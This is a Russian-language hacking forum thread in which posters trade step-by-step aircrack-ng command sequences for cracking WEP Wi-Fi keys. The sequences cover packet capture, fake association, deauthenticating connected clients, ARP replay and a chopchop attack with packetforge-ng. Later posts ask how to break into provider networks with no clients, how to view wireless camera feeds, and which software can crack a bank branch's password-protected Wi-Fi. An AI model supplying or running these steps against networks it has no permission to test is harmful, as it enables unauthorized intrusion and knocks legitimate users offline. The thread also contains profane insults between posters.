![]() |
хорошо! сначала запускаем в консоли команду iwconfig и там смотрим название wifi
девайса (должно быть чтото вроде wifiX, wlanX , ethX , athX , вместо X могут быть другие цифры) потом запускаем airodump-ng! пишем в консоль airodump-ng [девайс] далее появится список ТД и и доп. инфа потом выбирай с wepom ТД, смотри на каком она канале её BSSID и ESSID. далее останови airodump-ng (ctrl+c) и запусти с параметрами airodump-ng [девайс] -i -c канал -w capture --bssid FF:FF:FF:FF:FF:FF потом смотри как ловятся пакеты! если бысто то жди а если медленно то надо делать инъекцию(генерацию трафика)! но на возможность инъекции надо проверить твою карту! запускай aireplay-ng [девайс] -9 потом увидишь качество в процентах! чтобы сделать инъекцию надо ассоциироваться с AP! запускай aireplay-ng -1 0 -e <SSID AP> -h <твой MAC> [девайс] подожди увидомления что всё прошло OK и смотри в airodump-ng есть ли там клиенты?! если есть то надо этого клиента вырубить чтоп он нам дал нужные для генерации ARP пакеты! для этого сначала запусти aireplay-ng -3 -e <SSID AP> -h <твой MAC> [девайс] и запустится aireplay-ng на ловлю arp пакетов и в дальнейшем их пересылку! но чтоб этот пакет получить надо как я говорил выше отрубить клиента! запускай aireplay-ng -0 <кол-во отрубающих пакетов> -e <SSID AP> -c <MAC клиента > -h <MAC твой> [девайс] теперь жди когда набегут пакеты(100.000 хватит вполне) и запускай aircrack-ng *.ivs -a 1 и всё! написал как можно понятней и загляни в видио раздел там ещё есть корек chopchop атака генерации трафика которая немного по сложнее! |
У тебя ноутбук Asus?
|
неа! HP
понял чтонибудь? |
ДА, все понял, делал так уже до этого и chopchop пробовал, помог только SpoonWep, честно говоря.
|
да неможет быть!
chopchop должен был 100% помочь! значит инъекция не работает! |
Странно, надо проверить, у меня atheros
|
Цитата:
Без этого airodump-ng вообще не работает. airmon-ng stop ath0 airmon-ng start wifi0 А уже потом airodump-ng ath0 Мне кажется лучше вообще вот так airmon-ng start wifi0 X (где x это номер канала, на котором находится AP) Цитата:
Точно в параметре --bssid прописывать такой MAC? Он же ничего не найдет. Цитата:
Цитата:
|
В backtrack 3 final всё переводится в монитор автоматом без аирмонов!
девайс пишется хоть в пизде! FF числа которые у тебя в разделе -bssid! какого хера начал задавать далбаёбовские вопросы?! |
Цитата:
на atherose должно быть всё ок! так если у тя atheros чё под виндой не ломаешь? |
Цитата:
Может вопросы и глупые, зато сильно помогут новичка, которым все по шагам расписывать надо! |
Цитата:
потому что под виндой постоянно идут какие-то лаги, а BT3 визуально приятнее, все уже собрано в одной системе, фактически ничего настраивать не надо, да и с флешки бук дольше батарею держит. Посмотри на большое сообщение, я его отредактировал. |
Ну да согласен! винда говно!
|
Цитата:
А вообще не будем флудить, а то с утра проснутся модераторы и тогда... Бан, вечный бан :cool: Ты ChopChop атаку умеешь делать? Если да, то опиши как. |
СЮДА ЖМИ ну там всё очень просто! посмотри и сделай!
я chopchop ом всегда ломаю! для него не надо клиентов! |
Цитата:
|
ну какие могут быть ещё детали???
этот флуд очень полезен новичкам! нигде кроме здесь в античате нет таких описаний! |
Цитата:
|
ты имеешь ввиду как chopchop делать?
|
Цитата:
|
я спать хочу у меня 3 часа ночи, ну ладно объясню!
ставишь 1.сначала airdump-ng с опредделёнными параметрами 2.запускай aireplay-ng -4 athX -e <SSID> -h <твой мак> 3.он начнёт снифать пакеты и спрашивать этот ли пакет надо дешифровать? и предлогает ввести Y или N 4. ты ловишь любой пакет от этой AP и нажимаешь Y 5.если инъекция работает то всё будет OK (надо подаждать минут 5) 6.если всё прошло ok то вконце экрана высветится надписи типа got a replay34235.xor got a replay23453.cap 7. тебе нужен файл с расширением .xor 8. далее нам надо на основе этих данных сделать arp пакет который будем пересылать. 9.запускаем утилиту (точно параметры не помню) paccketforge-ng -0 -l 255.255.255.255 -k 255.255.255.255 -a mac AP -y <сюда пихаем файл с расширением .xor в нашем случае replay34235.xor> -w arp 9.почти готово.теперь запускаем aireplay-ng -2 -r arp -h <твой мак> -e <SSID> 10.снифай и крэкай! и незабудь в самом начале ассоциироваться с AP а то не хрина не получится! (aireplay-ng -1 0) |
Цитата:
_SEREGA_ ты не совсем прав... |
В чём я не прав???????
|
Такой вопрос - есть Ap с Wep шифрованием, через них гонится трафик, примерно 1 пакет секунду. Причем клиентов соединенных с этими АР нету(?). Пробовал разные виды атак, иньекций, ничего не помогает, трафик не нагоняется! Очень странно, вот еще что заметил, встречал я такие АР обычно по парно, в одом ресторане на одном канале с одинаковыми названиями их было аш 9! При том, это количество камер которые там стояли. Можно ли провести паралель между тем что было написано выше? Как расшевелить эти АР?
|
Кстати, наблюдение из собственного опыта - нагон трафика(передача Data пакетов), начинается минимум с 17-18 процентов, ниже просто не идет.
|
Кто-нибудь работал с этим железом? ORIENT XG-701A 54Mbit/s адаптер с внешней антенной (USB) http://www.orientrus.ru/top/catalogue/wifi
|
Уважаемые знатоки, покажите свое присутствие на форуме! Буду очень благодарен, если Вы ответите на мой вопрос.
С частными AP все понятно, но есть еще и провайдерские, например suntel, которые расшевелить вообще не могу. Возможно ли какими-то атаками нагнать трафик при отсутствие клиента в сети? Имеется в виду AP с WEP шифрованием. Как они так настраивают AP? Если какая-нибудь методика вычисления местонахождение AP\клиента, без применения GPS? Кроме того как идти по усиливающемуся сигналу? Заранее спасибо за ответы. |
Цитата:
|
Цитата:
|
Все вопросы по Bt3 задавать на соответствующем разделе форума?
|
Цитата:
|
Цитата:
|
Цитата:
Можно по подробнее про шлюз? Это, насколько я понимаю не AP, а машина с мотом для выхода в интернет? |
Цитата:
|
Цитата:
Еще слушал от друга про твой девайс в машине для подзарядки, можешь кинуть ссылку? |
Цитата:
Цитата:
Цитата:
|
Про просмотр изображения с вайрлесс камер, для этого нужен аналоговый видео ресивер\ретранслятор работающий на частоте 2.4 Ггц. В том видео к нему ппросто прикрутили антенну и подключили его к телевизору, через стандартныц трехкомпозитный кабель с тюльпанами. Стоит такой девайс в среднем от 1500 до 4000 р.
|
Цитата:
|
Цитата:
У тебя есть направленная антенна? Если да, то она на много усиливает сигнал? |
прива всем! и заранее спасибо за помощь !задача такова хочу купить кпк и очень неплохо было бы иметь софт по взлому wi-fi !но проблема в том что не могу решить какой !надеюсь на помощь !ценовой барьер 500$! ну и еще канечно хотелось бы хотя бы названия программ ! чем больше тем лучше!т.к. есть точка но в отделении банка соответственно под пасом
|
Цитата:
|
| Время: 18:52 |